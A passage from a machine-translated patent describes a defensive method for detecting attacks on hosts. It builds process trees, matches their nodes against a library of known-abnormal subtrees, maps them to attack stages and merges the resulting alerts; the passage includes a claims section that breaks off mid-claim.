In one embodiment, process behavior characteristics are stored in process nodes of a target process tree; the stored process behavior characteristics are obtained by extracting process commands corresponding to the process nodes; the method also includes a step of constructing the target process tree, which includes: acquiring an initial process tree constructed based on a generation relation among a plurality of processes; the initial process tree comprises at least one process node storing a process command; a generating relation exists between two process nodes which are on the same side in the initial process tree; homogenizing and converting all process commands which have different forms and the same function and are stored in all process nodes in the initial process tree so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree; and performing characteristic extraction on the process commands in the process nodes of the process tree after homogenization to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics.
The initial process tree is constructed based on the generation relation among the processes and before the process command in the process node is subjected to homogenization conversion. The process commands with different forms mean that the process commands are different in description form. It will be appreciated that the process data referred to above includes process commands.
For example, the two process commands passsd and pwd are different in form, but have the same function, i.e., passsd and pwd are both representational passwords. The two process commands of the adducer and the userdd are different in form, but have the same function, namely, the adducer and the userdd both represent new users. The morphology of the two process commands http and https is also different, but they have the same function, i.e. http, https, ftp and tcp are all representative transport protocols.
Specifically, the computer device may acquire an initial process tree constructed based on a generation relationship among a plurality of processes, and perform homogenization transformation on process commands having different forms and the same function, which are stored in process nodes in the initial process tree. That is, any process command is selected from process commands having different forms but the same function, and the selected process command is replaced with each process command having different forms but the same function, so that each process command having the same function has the same form, and a process tree after homogenization is obtained. Furthermore, the computer device can perform feature extraction on the process commands in the process nodes of the process tree after homogenization to obtain process behavior features, and construct a target process tree based on the process behavior features. It can be understood that the process node of the target process tree stores the process behavior characteristics corresponding to each progress node.
In the above embodiment, the process commands stored in the process nodes in the initial process tree are in different forms but have the same function, so that the process commands having the same function have the same form, the homogenized process tree is obtained, and the process commands in the process nodes of the homogenized process tree are subjected to feature extraction, so that more accurate process behavior features can be obtained, the process behavior feature extraction accuracy is improved, and therefore, abnormal process nodes can be identified from the target process tree more accurately in the follow-up process, and the abnormal process node identification accuracy is improved.
In one embodiment, the process node of the target process tree further stores a command parameter corresponding to the process command; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; the method comprises the following steps of extracting the characteristics of process commands in process nodes of a process tree after homogenization to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics, wherein the process behavior characteristics comprise the following steps: performing characteristic extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter characteristics; and performing feature extraction on the process command and the command parameter features in the process node to obtain process behavior features, and constructing a target process tree based on the process behavior features.
The command parameter feature is obtained by extracting the feature of the command parameter. It will be appreciated that the process data referred to above includes process commands, as well as command parameters corresponding to the process commands.
Specifically, the computer device may perform feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features. It can be understood that after the feature extraction is performed on the command parameters of the process nodes in the homogenized process tree, the process nodes in the process tree include process commands and command parameter features. Furthermore, the computer equipment can perform feature extraction on the process command and the command parameter feature in the process node to obtain the process behavior feature, and construct a target process tree based on the process behavior feature. It can be understood that the process node of the target process tree stores the process behavior characteristics corresponding to each progress node.
For example, the process command is https, and the command parameter corresponding to https is a specific IP address. If the command parameter corresponding to the process node a is IP 1 and the command parameter corresponding to the process node B is IP2, the computer device may perform feature extraction on the command parameter IP 1 and the command parameter IP2, respectively, to obtain the same command parameter feature, for example. And performing feature extraction on the command parameters IP 1 and IP2 to obtain the same command parameter feature PARAM (parameter).
In one embodiment, as shown in fig. 8, the process command is https, and the command parameter corresponding to https is a specific IP address, which is illustrated in fig. 8 as ": // xxx ", the feature extraction of command parameters may be divided into seven levels, the first level extracting the feature for command parameters with the symbol" IP ", the second level extracting the feature for command parameters with the symbol" URL ", and the third level extracting the feature for command parameters with the symbol" PARAM ". Since the features extracted by the third level can well represent that a specific IP address is a changeable parameter, the computer device can use the features extracted by the third level for the command parameters as the command parameter features.
In the above embodiment, since the change of the command parameter does not affect the whole attack process, the process behavior feature is obtained by performing feature extraction on the command parameter of the process node in the process tree after homogenization to obtain the command parameter feature, and performing feature extraction on the process command and the command parameter feature in the process node to obtain the process behavior feature, so that a relatively accurate process behavior feature can be obtained, the accuracy of extracting the process behavior feature is improved, an abnormal process node can be identified from the target process tree more accurately in the follow-up process, and the accuracy of identifying the abnormal process node is improved.
In one embodiment, the method further comprises: and under the condition that the abnormal detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal, determining the process node causing the error report of the target process tree abnormality in the abnormal process tree library, and deleting the process node causing the error report so as to update the abnormal process tree library.
In one embodiment, in the event that the exception detection result indicates that the target process tree is an exception, but the target process tree is not a true exception, the computer device may determine a process node in the exception process tree library that caused the false positive target process tree exception and directly delete the process node that caused the false positive to update the exception process tree library. It can be understood that, in this embodiment, the process node itself causing the false alarm is deleted, and the process tree in which the process node causing the false alarm is located is still retained in the abnormal process tree library.
In one embodiment, in the case that the anomaly detection result indicates that the target process tree is abnormal, but the target process tree is not true, the computer device may determine a process node in the abnormal process tree library that causes a false positive target process tree anomaly, determine a process tree in which the process node that causes the false positive is located, and delete the process tree in which the process node that causes the false positive is located to update the abnormal process tree library. It can be understood that the process tree in which the process node causing the false alarm is located is deleted in the embodiment, that is, the process tree in which the process node causing the false alarm is located is deleted from the abnormal process tree library.
In the above embodiment, the abnormal process tree library is updated by deleting the process node causing the false alarm, so that the accuracy of the data stored in the abnormal process tree library can be improved, and the accuracy of the subsequent abnormal process detection can be improved.
In one embodiment, obtaining a target process tree constructed based on generative relationships among a plurality of processes includes: acquiring a target process tree of a host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host; the method further comprises the following steps: and if the abnormality detection result aiming at the target process tree indicates that the target process tree is abnormal, judging that the process attacking the host exists in the processes.
In particular, the computer device mentioned above includes a host on which a plurality of processes can be run. The host computer can construct a target process tree according to the generation relationship among a plurality of processes running locally. The host can match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node, and performs primary abnormal detection on the target process tree based on the communication condition between the abnormal process nodes. Under the condition of preliminarily detecting the abnormality of the target process tree, the host can map the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node. Furthermore, the host can perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each anomalous process node in the target process tree, so as to obtain an anomaly detection result aiming at the target process tree. It can be understood that if the abnormality detection result for the target process tree indicates that the target process tree is abnormal, it is determined that a process attacking the host exists in the plurality of processes running on the host. And if the abnormal detection result aiming at the target process tree indicates that the target process tree is normal, judging that the process attacking the host does not exist in the plurality of processes running on the host.
In one embodiment, the host may be a cloud host deployed on a cloud, or may be another host deployed in a non-cloud environment.
In the above embodiment, the target process tree constructed according to the generation relationship among the processes running on the host is detected, and whether a process attacking the host exists in the processes running on the host is determined based on the abnormal detection result for the target process tree, so that the abnormal process detection accuracy can be improved.
In one embodiment, as shown in fig. 9, a subtree extraction unit, an anomaly detection unit and an operation unit are included in a computer device. The computer equipment can obtain at least one piece of historical alarm information from the historical process log through the subtree extraction unit; for each piece of historical alarm information, determining a process node to which the historical alarm information is directed, obtaining an alarm process node corresponding to the historical alarm information (as can be understood, each alarm process node has a unique process node identifier), and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is located, so as to obtain a process subtree corresponding to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information. Furthermore, the computer device can acquire a plurality of processes from the real-time process log through the abnormality detection unit, and construct and obtain the target process tree based on the plurality of processes. And aiming at each process node in the target process tree, comparing the process node with each process node in the abnormal process tree library respectively, and taking the process node which is consistent with the process node in the target process tree as the detected abnormal process node. The computer device may perform preliminary anomaly detection on the target process tree based on connectivity between the anomalous process nodes. Under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node; and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree. Generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information. And under the condition that the abnormal detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal, the computer equipment can reject the false report through the operation unit, determine the process node causing the false report of the target process tree abnormality in the abnormal process tree library, and delete the process node causing the false report so as to update the abnormal process tree library. In addition, the operation unit can delete the process nodes causing false alarm in the abnormal process tree library through manual intervention.
As shown in fig. 10, in one embodiment, an abnormal process detection method is provided, and the method is applicable to a computer device, where the computer device may be a terminal or a server, and is executed by the terminal or the server itself, or may be implemented through interaction between the terminal and the server. The method can be applied to a scene of attack detection aiming at the cloud host, wherein the cloud host refers to a host deployed in a cloud environment. It can be understood that the method can also be applied to a scenario of attack detection for computer devices in a non-cloud environment, which is not limited by this embodiment. The method specifically comprises the following steps:
step 1002, obtaining an initial process tree constructed based on a generation relationship among a plurality of processes; the initial process tree comprises at least one process node which stores a process command and a command parameter corresponding to the process command; and a generating relation exists between two process nodes which are on the same edge in the initial process tree.
It can be understood that, in the case that the abnormal process detection method is applied to a scenario of attack detection for a cloud host, multiple processes may be run on the cloud host, and the cloud host may construct an initial process tree based on a generation relationship among the multiple processes.
And 1004, performing homogenization conversion on the process commands with different forms and the same function stored in the process nodes in the initial process tree, so that the process commands with the same function have the same form, and obtaining a homogenized process tree.
Step 1006, performing feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features.
Step 1008, extracting the characteristics of the process command and the command parameter characteristics in the process node to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics; the process node of the target process tree stores the process behavior characteristics.
It can be understood that, when the abnormal process detection method is applied to a scenario of attack detection for a cloud host, the constructed target process tree is the target process tree constructed for the cloud host.
Step 1010, acquiring a target process tree constructed based on a generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generation relation exists between two process nodes on a common edge in the target process tree; the target process tree comprises at least one process chain; each process chain comprises at least one process node.
Step 1012, aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library, and taking the process node with the consistent characteristics as the abnormal process node.
And 1014, determining the communicated abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes.
Step 1016, determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes.
And step 1018, performing duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
Step 1020, if the number of the target abnormal process nodes is greater than a preset number threshold, preliminarily determining that the target process tree is abnormal.
Step 1022, under the condition of preliminarily detecting the target process tree exception, determining the mapping relationship between the preset process behavior characteristics and the attack stage.
And step 1024, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation for each abnormal process node to obtain the attack stage corresponding to the abnormal process node.
In step 1026, if at least one stage belonging to the execution type exists in the attack stage respectively corresponding to each abnormal process node in the target process tree, it is determined that the target process tree is abnormal.
It can be understood that, in the case that the abnormal process detection method is applied to an attack detection scenario for the cloud host, if a target process tree of the cloud host is abnormal, it may be determined that a process which attacks the cloud host exists in a plurality of processes running on the cloud host. In turn, steps 1028 through 1032 may be performed to generate target alarm information for the attacked cloud host.
Step 1028, generating corresponding single-point alarm information for each abnormal process node in the target process tree.
Step 1030, after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain the alarm information corresponding to the process chain.
And 1032, merging the alarm information respectively corresponding to each process chain in the target process tree to obtain target alarm information and outputting the target alarm information.
The method and the device have the advantages that the output target alarm information can prompt and alarm the condition that the cloud host is attacked by the process, the condition that the cloud host is not known when the cloud host is attacked is avoided, and accordingly the safety of the cloud host is improved.
It should be noted that the abnormal process detection method in the foregoing embodiment is not limited to be used only in an attack detection scenario for a cloud host, and may also be used in other scenarios to detect an abnormal process, because a computer device in a general environment (i.e., a non-cloud environment) may be attacked by a process, for example, a general computer terminal may be attacked by a hacker using a process, the abnormal process detection method in the present application may also be used in an attack detection scenario for a computer device in a general environment. This is not limitative.
In order to more clearly understand how the abnormal process detection method in the embodiment of the present application is applied in a scenario of attack detection for a cloud host, the following specific description is made. Specifically, the cloud host may obtain an initial process tree constructed based on a generation relationship among a plurality of processes running locally; the initial process tree comprises at least one process node which stores a process command and a command parameter corresponding to the process command; and a generating relation exists between two process nodes which are on the same edge in the initial process tree. And carrying out homogenization conversion on all process commands with different forms and the same function stored in all process nodes in the initial process tree so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree. And carrying out characteristic extraction on the command parameters of the process nodes in the process tree after homogenization to obtain command parameter characteristics. Performing feature extraction on process commands and command parameter features in the process nodes to obtain process behavior features, and constructing a target process tree based on the process behavior features; the process node of the target process tree stores the process behavior characteristics.
The cloud host can acquire a target process tree constructed based on the generation relationship among the processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree; the target process tree comprises at least one process chain; each process chain includes at least one process node. And aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library respectively, and taking the process node with the consistent characteristics in the target process tree as the abnormal process node. And determining communicated abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes. And determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes. And removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process node. And if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
Under the condition of preliminarily detecting the abnormality of the target process tree, the cloud host can determine the mapping relation between the preset process behavior characteristics and the attack stage. And aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node. And if at least one stage belonging to the execution type exists in the attack stages respectively corresponding to the abnormal process nodes in the target process tree, judging that the target process tree is abnormal. It can be understood that if the target process tree is detected to be abnormal, it is determined that a process which attacks the cloud host exists in the plurality of processes running on the cloud host. And if the target process tree is detected to be normal, judging that the process for attacking the cloud host does not exist in the plurality of processes running on the cloud host.
The cloud host can generate corresponding single-point alarm information aiming at each abnormal process node in the target process tree, and after the target process tree is detected to be abnormal in the advanced stage, the single-point alarm information corresponding to each abnormal process node in the process chain is connected in series aiming at each process chain in the target process tree, so that the alarm information corresponding to the process chain is obtained. And merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information. By the abnormal process detection method, the abnormal process detection accuracy rate of the cloud host deployed in the cloud environment can be improved.
The application further provides an application scenario, that is, the abnormal process detection method in the application can be applied to an attack detection scenario for computer equipment deployed in a non-cloud environment. It can be understood that, a lot of important data are stored on the computer device, and it is necessary to perform exception detection on the process received by the computer device and intervene in the process for detecting exception, so as to prevent the occurrence of security risk events such as virus propagation, exploit and data leakage, and thus ensure the security of data on the computer device. By the abnormal process detection method, the abnormal process detection accuracy rate of the computer equipment deployed in the non-cloud environment can be improved.
It should be understood that, although the steps in the flowcharts of the above embodiments are shown in sequence, the steps are not necessarily executed in sequence. The steps are not performed in the exact order shown and described, and may be performed in other orders, unless explicitly stated otherwise. Moreover, at least a part of the steps in the above embodiments may include multiple sub-steps or multiple stages, which are not necessarily performed at the same time, but may be performed at different times, and the order of performing the sub-steps or the stages is not necessarily performed in sequence, but may be performed alternately or alternately with other steps or at least a part of the sub-steps or the stages of other steps.
In one embodiment, as shown in fig. 11, an abnormal process detection apparatus 1100 is provided, which may be a part of a computer device using a software module or a hardware module, or a combination of the two, and specifically includes:
an obtaining module 1102, configured to obtain a target process tree constructed based on a generating relationship among multiple processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
a matching module 1104, configured to match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library, respectively, to obtain a matched abnormal process node;
a detection module 1106, configured to perform preliminary anomaly detection on the target process tree based on a communication condition between the abnormal process nodes;
the mapping module 1108 is configured to map, under the condition that the target process tree is detected to be abnormal preliminarily, process behavior characteristics corresponding to an abnormal process node to obtain an attack stage corresponding to the abnormal process node;
the detecting module 1106 is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each anomalous process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
In one embodiment, the mapping module 1108 is further configured to determine a mapping relationship between preset process behavior characteristics and an attack phase; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
In an embodiment, the detecting module 1106 is further configured to determine that the target process tree is abnormal if at least one of the attack phases respectively corresponding to each abnormal process node in the target process tree belongs to the execution type.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the device still includes:
the merging module is used for generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information.
In one embodiment, the apparatus further comprises:
the first construction module is used for acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree; aiming at each piece of historical alarm information, determining a process node aimed at by the historical alarm information to obtain an alarm process node corresponding to the historical alarm information, and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is positioned to obtain a process subtree corresponding to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
In one embodiment, the detecting module 1106 is further configured to determine connected abnormal process nodes from the matched abnormal process nodes to obtain a target abnormal process node; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, the detecting module 1106 is further configured to determine connected abnormal process nodes from the matched abnormal process nodes, to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics from a plurality of candidate abnormal process nodes; and carrying out duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
In an embodiment, the matching module 1104 is further configured to compare, for each process node in the target process tree, the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library, respectively, and use the process node with the consistent characteristic comparison in the target process tree as the abnormal process node.
In one embodiment, process behavior characteristics are stored in process nodes of a target process tree; the stored process behavior characteristics are obtained by extracting process commands corresponding to the process nodes; the device still includes:
the second construction module is used for acquiring an initial process tree constructed based on the generation relation among the processes; the initial process tree comprises at least one process node storing a process command; a generating relation exists between two process nodes which are on the same side in the initial process tree; carrying out homogenization conversion on all process commands which are stored in all process nodes in the initial process tree and have different forms but the same function so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree; and performing characteristic extraction on the process commands in the process nodes of the process tree after homogenization to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics.
In one embodiment, the process node of the target process tree further stores a command parameter corresponding to the process command; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; the second building module is also used for carrying out feature extraction on the command parameters of the process nodes in the process tree after homogenization to obtain command parameter features; and performing feature extraction on the process command and the command parameter features in the process node to obtain process behavior features, and constructing a target process tree based on the process behavior features.
In one embodiment, the apparatus further comprises:
and the updating module is used for determining the process node causing the error report of the target process tree abnormality in the abnormal process tree library and deleting the process node causing the error report so as to update the abnormal process tree library under the condition that the abnormality detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal.
In one embodiment, the obtaining module 1102 is further configured to obtain a target process tree of the host; the target process tree is constructed according to the generation relation among a plurality of processes running on the host; the detecting module 1106 is further configured to determine that a process attacking the host exists in the plurality of processes if the anomaly detection result for the target process tree indicates that the target process tree is abnormal.
The abnormal process detection device acquires a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; and because each process node in the abnormal process tree library is abnormal, the abnormal process node in the target process tree can be more accurately determined. And then the preliminary anomaly detection of the target process tree is carried out based on the communication condition between the abnormal process nodes, so that whether the target process tree is abnormal or not can be accurately preliminarily detected. And under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node. Because a generating relation exists between two process nodes on a common edge in the target process tree, the target process tree is subjected to advanced anomaly detection through the attack stages corresponding to the abnormal process nodes in the target process tree, so that the information of the attack process corresponding to the abnormal process nodes in the target process tree is comprehensively considered, the anomaly detection result aiming at the target process tree can be accurately obtained, and the detection accuracy rate aiming at the abnormal process is improved.
The modules in the abnormal process detection device can be wholly or partially realized by software, hardware and a combination thereof. The modules can be embedded in a hardware form or independent from a processor in the computer device, and can also be stored in a memory in the computer device in a software form, so that the processor can call and execute operations corresponding to the modules.
In one embodiment, a computer device is provided, which may be a server, and its internal structure diagram may be as shown in fig. 12. The computer device includes a processor, a memory, an Input/Output interface (I/O for short), and a communication interface. The processor, the memory and the input/output interface are connected through a system bus, and the communication interface is connected to the system bus through the input/output interface. Wherein the processor of the computer device is configured to provide computing and control capabilities. The memory of the computer device includes a non-volatile storage medium and an internal memory. The non-volatile storage medium stores an operating system, a computer program, and a database. The internal memory provides an environment for the operation of an operating system and computer programs in the non-volatile storage medium. The input/output interface of the computer device is used for exchanging information between the processor and an external device. The communication interface of the computer device is used for connecting and communicating with an external terminal through a network. The computer program is executed by a processor to implement an abnormal process detection method.
In one embodiment, a computer device is provided, which may be a terminal, and its internal structure diagram may be as shown in fig. 13. The computer apparatus includes a processor, a memory, an input/output interface, a communication interface, a display unit, and an input device. The processor, the memory and the input/output interface are connected through a system bus, and the communication interface, the display unit and the input device are connected to the system bus through the input/output interface. Wherein the processor of the computer device is configured to provide computing and control capabilities. The memory of the computer device comprises a nonvolatile storage medium and an internal memory. The non-volatile storage medium stores an operating system and a computer program. The internal memory provides an environment for the operation of an operating system and computer programs in the non-volatile storage medium. The input/output interface of the computer device is used for exchanging information between the processor and an external device. The communication interface of the computer device is used for carrying out wired or wireless communication with an external terminal, and the wireless communication can be realized through WIFI, a mobile cellular network, NFC (near field communication) or other technologies. The computer program is executed by a processor to implement an abnormal process detection method. The display unit of the computer equipment is used for forming a visual and visible picture, and can be a display screen, a projection device or a virtual reality imaging device, the display screen can be a liquid crystal display screen or an electronic ink display screen, the input device of the computer equipment can be a touch layer covered on the display screen, a key, a track ball or a touch pad arranged on the shell of the computer equipment, and can also be an external keyboard, a touch pad or a mouse and the like.
It will be appreciated by those skilled in the art that the configurations shown in fig. 12 and 13 are only block diagrams of some configurations relevant to the present disclosure, and do not constitute a limitation on the computer device to which the present disclosure may be applied, and a particular computer device may include more or less components than those shown in the figures, or may combine certain components, or have a different arrangement of components.
In one embodiment, a computer device is further provided, which includes a memory and a processor, the memory stores a computer program, and the processor implements the steps of the above method embodiments when executing the computer program.
In an embodiment, a computer-readable storage medium is provided, in which a computer program is stored which, when being executed by a processor, carries out the steps of the above-mentioned method embodiments.
In an embodiment, a computer program product is provided, comprising a computer program which, when executed by a processor, carries out the steps in the above-described method embodiments.
It should be noted that, the user information (including but not limited to user equipment information, user personal information, etc.) and data (including but not limited to data for analysis, stored data, displayed data, etc.) referred to in the present application are information and data authorized by the user or sufficiently authorized by each party, and the collection, use and processing of the related data need to comply with the relevant laws and regulations and standards of the relevant country and region.
It will be understood by those skilled in the art that all or part of the processes of the methods of the embodiments described above can be implemented by hardware instructions of a computer program, which can be stored in a non-volatile computer-readable storage medium, and when executed, can include the processes of the embodiments of the methods described above. Any reference to memory, storage, database or other medium used in the embodiments provided herein can include at least one of non-volatile and volatile memory. Non-volatile Memory may include Read-Only Memory (ROM), magnetic tape, floppy disk, flash Memory, optical storage, or the like. Volatile Memory can include Random Access Memory (RAM) or external cache Memory. By way of illustration and not limitation, RAM can take many forms, such as Static Random Access Memory (SRAM) or Dynamic Random Access Memory (DRAM), among others.
The technical features of the above embodiments can be arbitrarily combined, and for the sake of brevity, all possible combinations of the technical features in the above embodiments are not described, but should be considered as the scope of the present specification as long as there is no contradiction between the combinations of the technical features.
The above-mentioned embodiments only express several embodiments of the present application, and the description thereof is more specific and detailed, but not construed as limiting the scope of the invention. It should be noted that, for a person skilled in the art, several variations and modifications can be made without departing from the concept of the present application, which falls within the scope of protection of the present application. Therefore, the protection scope of the present patent shall be subject to the appended claims.

Claims (16)

1. An abnormal process detection method, characterized in that the method comprises:
acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing an edge in the target process tree;
matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
performing preliminary anomaly detection on the target process tree based on the communication condition between the abnormal process nodes;
under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node;
and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree.
2. The method according to claim 1, wherein the mapping the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node comprises:
determining a mapping relation between preset process behavior characteristics and an attack stage;
and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
3. The method of claim 1, wherein the target process tree comprises at least one process chain; each process chain comprises at least one process node; the method further comprises the following steps:
generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree;
after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain;
and merging the alarm information corresponding to each process chain in the target process tree to obtain target alarm information and outputting the target alarm information.
4. The method of claim 1, further comprising the step of constructing an abnormal process tree library; the construction step of the abnormal process tree library comprises the following steps:
acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree;
aiming at each piece of historical alarm information, determining a process node aimed at by the historical alarm information to obtain an alarm process node corresponding to the historical alarm information, and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is located to obtain a process subtree corresponding to the historical alarm information;
and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
5. The method as claimed in claim 1, wherein the preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes comprises:
determining communicated abnormal process nodes from the matched abnormal process nodes to obtain target abnormal process nodes;
and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
6. The method of claim 5, wherein determining the connected abnormal process nodes from the matched abnormal process nodes to obtain the target abnormal process node comprises:
determining communicated abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes;
determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes;
and removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
7. The method of claim 1, wherein process behavior characteristics are stored in process nodes of the target process tree; the stored process behavior characteristics are extracted based on the process command corresponding to the process node; the method further comprises a step of constructing a target process tree, wherein the step of constructing the target process tree comprises the following steps:
acquiring an initial process tree constructed based on a generation relation among a plurality of processes; the initial process tree comprises at least one process node storing the process command; a generating relation exists between two process nodes which are on the same side in the initial process tree;
carrying out homogenization conversion on all process commands which are stored in all process nodes in the initial process tree and have different forms but the same function so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree;
and performing characteristic extraction on the process command in the process node of the homogenized process tree to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics.
8. The method of claim 7, wherein the process node of the target process tree further stores a command parameter corresponding to the process command; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; the step of extracting the characteristics of the process commands in the process nodes of the homogenized process tree to obtain the process behavior characteristics, and constructing the target process tree based on the process behavior characteristics comprises the following steps:
performing characteristic extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter characteristics;
and performing feature extraction on the process command and the command parameter features in the process node to obtain process behavior features, and constructing a target process tree based on the process behavior features.
9. The method according to claim 1, wherein the matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node comprises:
and aiming at each process node in the target process tree, respectively comparing the process behavior characteristics corresponding to the process nodes with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and taking the process nodes with the consistent characteristics in the target process tree as abnormal process nodes.
10. The method according to claim 1, wherein the performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result for the target process tree comprises:
and if at least one stage belonging to the execution type exists in the attack stage respectively corresponding to each abnormal process node in the target process tree, judging that the target process tree is abnormal.
11. The method of claim 10, further comprising:
and under the condition that the abnormality detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal, determining a process node causing the target process tree to be abnormal by mistake in the abnormal process tree library, and deleting the process node causing the false alarm so as to update the abnormal process tree library.
12. The method according to any one of claims 1 to 11, wherein the obtaining a target process tree constructed based on generative relationships among a plurality of processes comprises:
acquiring a target process tree of a host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host;
the method further comprises the following steps:
and if the abnormality detection result aiming at the target process tree indicates that the target process tree is abnormal, judging that a process attacking the host exists in the processes.
13. An abnormal process detection apparatus, the apparatus comprising:
the acquisition module is used for acquiring a target process tree constructed based on the generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
the matching module is used for respectively matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
the detection module is used for carrying out preliminary abnormal detection on the target process tree based on the communication condition between the abnormal process nodes;
the mapping module is used for mapping the process behavior characteristics corresponding to the abnormal process node under the condition of preliminarily detecting the abnormality of the target process tree to obtain an attack stage corresponding to the abnormal process node;
